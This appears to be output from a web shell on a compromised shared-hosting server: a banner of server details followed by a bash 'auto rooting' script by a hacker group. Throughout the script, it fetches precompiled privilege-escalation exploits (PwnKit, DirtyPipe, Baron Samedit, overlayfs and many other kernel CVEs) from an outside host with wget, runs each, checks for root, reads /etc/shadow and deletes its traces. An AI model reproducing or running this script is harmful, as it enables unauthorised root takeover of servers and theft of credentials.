| Server IP : 172.67.216.113 / Your IP : 172.71.28.146 [ Web Server : Apache System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64 User : cp648411 ( 1354) PHP Version : 7.2.34 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home2/cp648411/public_html/simded.com/redbag/wal_banner/a/ |
Upload File : |
#!/bin/bash
RED='\033[91m'
ENDCOLOR='\033[0m'
echo "************************************************************"
echo -e "${RED}Auto Rooting Server By: đź’€Seobarbar1337-TegalXploiter-7Syndicateđź’€${ENDCOLOR}"
echo -e "${RED}Blog: https://www.xploit.info${ENDCOLOR}"
echo "************************************************************"
check_root() {
if [ $(id -u) -eq 0 ]; then
echo
echo "Successfully Get Root Access"
echo "ID => $(id -u)"
echo "WHOAMI => $USER"
echo
exit
fi
}
check_pkexec_version() {
output=$(pkexec --version)
version=""
while IFS= read -r line; do
if [[ $line == "pkexec version"* ]]; then
version="${line##* }"
break
fi
done <<< "$output"
echo "$version"
}
run_commands_with_pkexec() {
pkexec_version=$(check_pkexec_version)
echo "pkexec version: $pkexec_version"
if [[ $pkexec_version == "0.105" || $pkexec_version == "0.96" || $pkexec_version == "0.95" || $pkexec_version == "0.096" ]]; then
wget -q "https://0-gram.github.io/id-0/exp_file_credential" --no-check-certificate
chmod 777 "exp_file_credential"
./exp_file_credential
check_root
rm -f "exp_file_credential"
rm -rf "exp_dir"
else
echo "pkexec ora supported"
fi
}
run_commands_with_pkexec
echo "đź’€Menjalankan Pwnkit....đź’€"
wget -q "https://0-gram.github.io/id-0/ak" --no-check-certificate
chmod 777 "ak"
./ak
check_root
rm -f "ak"
rm -rf "GCONV_PATH=."
rm -rf ".pkexec"
echo "đź’€Menjalankan sudo barron samedit....đź’€"
wget -q "https://0-gram.github.io/id-0/exploit_userspec.py" --no-check-certificate
chmod 777 "exploit_userspec.py"
python exploit_userspec.py
check_root
rm -f "exploit_userspec.py"
rm -f "0"
rm -f "kmem"
rm -f "sendfile1"
echo "đź’€Menjalankan CVE-2022-0847-DirtyPipe-Exploitsđź’€"
wget -q "https://0-gram.github.io/id-0/CVE-2022-0847-DirtyPipe-Exploits/a2.out" --no-check-certificate
chmod 777 "a2.out"
find / -perm 4000 -type -f 2>/dev/null || find / -perm -u=s -type -f 2>/dev/null
./a2.out /usr/bin/sudo
check_root
./a2.out /usr/bin/passwd
check_root
rm -f "a2.out"
echo "đź’€Menjalankan dirtypipe cve-2022-0847....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/sudodirtypipe
chmod 777 sudodirtypipe
./sudodirtypipe /usr/local/bin
check_root
rm sudodirtypipe
echo "đź’€Menjalankan af_packet....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/af_packet
chmod 777 af_packet
./af_packet
check_root
rm af_packet
echo "đź’€Menjalankan CVE-2015-1328 / overlayfs....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/CVE-2015-1328
chmod 777 CVE-2015-1328
./CVE-2015-1328
check_root
rm CVE-2015-1328
echo "đź’€Menjalankan CAP_NET_ADMIN / CVE-2016-9793....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/CVE-2016-9793
chmod 777 CVE-2016-9793
./CVE-2016-9793
check_root
rm CVE-2016-9793
echo "đź’€Menjalankan Ptrace....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/ptrace
chmod 777 ptrace
./ptrace
check_root
rm ptrace
echo "đź’€Menjalankan CVE-2017-16995....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/cve-2017-16995
chmod 777 cve-2017-16995
./cve-2017-16995
check_root
rm cve-2017-16995
echo "đź’€Menjalankan exploit-debian....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/exploit-debian
chmod 777 exploit-debian
./exploit-debian
check_root
rm exploit-debian
echo "đź’€Menjalankan exploit-ubuntu....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/exploit-ubuntu
chmod 777 exploit-ubuntu
./exploit-ubuntu
check_root
rm exploit-ubuntu
echo "đź’€Menjalankan newpid.....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/newpid
chmod 777 newpid
./newpid
check_root
rm newpid
echo "đź’€Menjalankan CVE-2015-1862....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/raceabrt
chmod 777 raceabrt
./raceabrt
check_root
rm raceabrt
echo "đź’€Menjalankan CVE-2014-0038....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/timeoutpwn
chmod 777 timeoutpwn
./timeoutpwn
check_root
rm timeoutpwn
echo "đź’€Menjalankan Ubuntu 16.04.4 kernel priv esc....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/upstream44
chmod 777 upstream44
./upstream44
check_root
rm upstream44
echo "đź’€Menjalankan lpe exploit / CVE-2022-37706....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/lpe.sh
chmod 777 lpe.sh
head -2 /etc/shadow
./lpe.sh
check_root
rm lpe.sh
echo "đź’€Menjalankan usb mini....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/a.out
chmod 777 a.out
./a.out 0 && ./a.out 1
check_root
rm a.out
echo "đź’€Menjalankan cve-2017-1000367.....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/linux_sudo_cve-2017-1000367
chmod 777 linux_sudo_cve-2017-1000367
./linux_sudo_cve-2017-1000367
check_root
rm linux_sudo_cve-2017-1000367
echo "đź’€Menjalankan CVE-2021-3493 / OverlayFS....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/overlayfs
chmod 777 overlayfs
./overlayfs
check_root
rm overlayfs
echo "đź’€Menjalankan SocketPacket/CVE-2017-7308đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/CVE-2017-7308
chmod 777 CVE-2017-7308
./CVE-2017-7308
check_root
rm CVE-2017-7308
echo "đź’€Menjalankan CVE-2022-2639....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/CVE-2022-2639
chmod 777 CVE-2022-2639
./CVE-2022-2639
check_root
rm CVE-2022-2639
echo "đź’€Menjalankan CVE-2011-1485/polkit-pwnage....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/polkit-pwnage
chmod 777 polkit-pwnage
./polkit-pwnage
check_root
rm polkit-pwnage
echo "đź’€Menjalankan CVE-2018-100000.....đź’€"
wget -q --no-check-certificate https://0-gram.github.io/id-0/RationalLove
chmod 777 RationalLove
./RationalLove
check_root
rm RationalLove